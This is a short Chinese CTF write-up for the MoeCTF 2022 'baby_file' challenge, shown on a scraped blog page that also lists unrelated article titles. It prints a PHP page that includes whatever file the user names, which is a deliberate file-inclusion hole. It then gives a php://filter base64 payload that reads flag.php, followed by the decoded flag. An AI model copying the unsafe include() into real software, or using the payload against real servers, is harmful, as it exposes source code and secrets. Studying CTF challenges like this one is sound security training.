当前位置: 首页 > news >正文

[MoeCTF 2022]baby_file

news 2025/6/27 1:27:31

题目

<html>
<title>Here's a secret. Can you find it?</title>
<?phpif(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}
?>
</html>

读取flag

/?file=php://filter/read=convert.base64-encode/resource=flag.php

使用bp解码

拿下flag

NSSCTF{00bb1bc4-f867-45af-b88b-02b18cd6725b};

http://www.lryc.cn/news/532905.html

相关文章:

  • 【AI日记】25.02.07 探索开辟第二战场
  • path 路径模块
  • SpringBoot中的多环境配置管理
  • mac下生成.icns图标
  • 关于JS继承的七种方式和理解
  • 储能系统-系统架构
  • AI智算-k8s部署DeepSeek Janus-Pro-7B 多模态大模型
  • 【截图】selenium自动通过浏览器截取指定元素div的图片
  • 如何导入第三方sdk | 引入第三方jar 包
  • HarmonyOS 5.0应用开发——ContentSlot的使用
  • C#常用集合优缺点对比
  • 基于CLIP视觉语言大模型的行人重识别方法的简单框架设计
  • RabbitMQ 从入门到精通:从工作模式到集群部署实战(三)
  • BurpSuite抓包与HTTP基础
  • SQL Server 数据库迁移到 MySQL 的完整指南
  • 【大模型】DeepSeek与chatGPT的区别以及自身的优势
  • DeepSeek:知识图谱与大模型参数化知识融合的创新架构
  • ES6 迭代器 (`Iterator`)使用总结
  • 信用修复和失联修复的区别
  • 2025蓝桥杯JAVA编程题练习Day3
  • [论文阅读] Knowledge Fusion of Large Language Models
  • deepseek来讲lua
  • 探索 Spring Cloud Alibaba:开启微服务架构新时代
  • 【数据结构】(6) LinkedList 链表
  • 【工具变量】上市公司企业渐进式创新程度及渐进式创新锁定数据(1991-2023年)
  • 07_任务状态——改进播放控制
  • 【R语言】apply函数族
  • Retrieval-Augmented Generation,检索增强生成流程
  • [AI][本地部署]离线升级后报ChromeDb错误
  • Pinocchio: 刚体动力学算法库介绍